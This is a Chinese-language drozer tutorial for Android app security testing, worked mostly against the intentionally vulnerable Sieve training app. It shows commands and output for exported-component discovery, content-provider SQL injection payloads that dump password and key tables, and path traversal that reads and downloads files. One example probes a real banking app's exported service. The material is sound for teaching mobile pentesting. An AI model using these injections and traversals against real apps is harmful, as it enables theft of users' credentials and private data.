Github Drozer
drozer guide

安装

  1. 安装drozer-agent-x.x.x.apk并开启服务,服务默认监听31415端口。
  2. 通过adb forward 转发31415端口:adb forward tcp:31415 tcp:31415
  3. 通过drozer console connect连接设备。

使用

1. 获取获取Android设备上的所有的安装的App的包名

run app.package.list,也可以通过-f key增加关键词过滤run app.package.list -f sieve

2. 获取某个应用的基本信息,参数为程序包名

run app.package.info -a packageName

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
> dz> run app.package.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Process Name: com.mwr.example.sieve
Version: 1.0
Data Directory: /data/data/com.mwr.example.sieve
APK Path: /data/app/com.mwr.example.sieve-2.apk
UID: 10056
GID: [1028, 1015, 3003]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.INTERNET
Defines Permissions:
- com.mwr.example.sieve.READ_KEYS
- com.mwr.example.sieve.WRITE_KEYS

可以看到应用的版本信息,数据存储的目录,用户ID,组ID,是否有共享库,还有权限信息等。

3. 确定攻击面(Itentify The Attack Surface)

run app.package.attacksurface packageName

1
2
3
4
5
6
7
    > dz> run app.activity.info -a  com.mwr.example.sieve
Attack Surface:
3 activities exported
0 broadcast receivers exported
2 content providers exported
2 services exported
is debuggable

显示了潜在可以利用的组件个数: “exported”表示组件可以被其他App使用。 services is debuggable表示我们可以用adb绑定一个调试器到进程

4. 进一步获取Attack Surface的信息

run app.activity.info -a packageName

1
2
3
4
5
> dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.FileSelectActivity
com.mwr.example.sieve.MainLoginActivity
com.mwr.example.sieve.PWList

5. 启动Activities

run app.activity.start --component packageName activityName

1
2
3
4
5
6
7
8
9
10
>dz> run app.activity.start --component
com.mwr.example.sieve com.mwr.example.sieve.PWList

>dz> help app.activity.start
usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY [CATEGORY ...]]
[--component PACKAGE COMPONENT] [--data-uri DATA_URI]
[--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]
[--mimetype MIMETYPE]

Starts an Activity using the formulated intent.

6. 从Content Provider中获取信息

run app.provider.info -a packageName

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
> dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False

两个exported的content provider的具体信息,包括名字,权限,访问路径等。

7. 查找可以访问Content Provider的URI(数据泄漏)

run scanner.provider.finduris -a packageName

1
2
3
4
5
6
7
8
9
> dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
检测出了可以访问content的URI,接下来我们可以用drozer的其他模块和URI从content中获取,甚至更改信息
1
2
3
4
5
6
7
> dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64-encoded)
email: incognitoguy50@gmail.com
获取了用户名,邮箱帐号,和Base64编码的密码字符串

8. SQL注入

1
2
3
4
5
6
7
8
> dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "'"
unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT '
FROM Passwords
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords
WHERE (')
命令执行后Android设备返回了非常详细的错误信息

9. 使用Sql注入列出数据库中的所有数据表

1
2
3
4
5
6
7
8
9
10
11
> dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "* FROM SQLITE_MASTER WHERE type='table';--"
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |
| table | Passwords | Passwords | 4 | CREATE TABLE ... |
| table | Key | Key | 5 | CREATE TABLE ... |
>
> dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "* FROM Key;--"
| Password | pin |
| thisismypassword | 9876 |

10. 从File System-Backed Content Providers获取信息

File System-backed Content Provider提供了访问底层文件系统的方法,Android沙盒会阻止App共享文件允许,而File System-backed Content Provider允许App共享文件。 对于sieve来说,我们可以推测出的FileBackupProvider就是一个file system-backed content provider。 我们可以使用drozer的app.provider.read模块查看某个文件或者下载文件。

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data
/data/com.mwr.example.sieve/databases/database.db /home/user/database.db

11. 检查Content Provider的脆弱性

检查是否有sql注入run scanner.provider.injection -a packageName
检查是否存在遍历文件的漏洞run scanner.provider.traversal -a packageName

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
> dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider

12. 和Services交互

获取是exported状态的services的命令run app.service.info -a packeageName

1
2
3
4
> dz> run app.service.info -a com.bank.pingan
Package: com.bank.pingan
com.pingan.bank.apps.cejmodule.services.StatisticsService
Permission: null

13. 向某个服务发送信息

run app.service.send packageName serviceName --msg 1 5 3

14. 其他常用模块

1
2
3
shell.start 在Android设备上开启一个交互式Linux Shell
tools.file.upload / tools.file.download
tools.setup.busybox / tools.setup.minimalsu 安装busybox或者minimalsu到Android设备上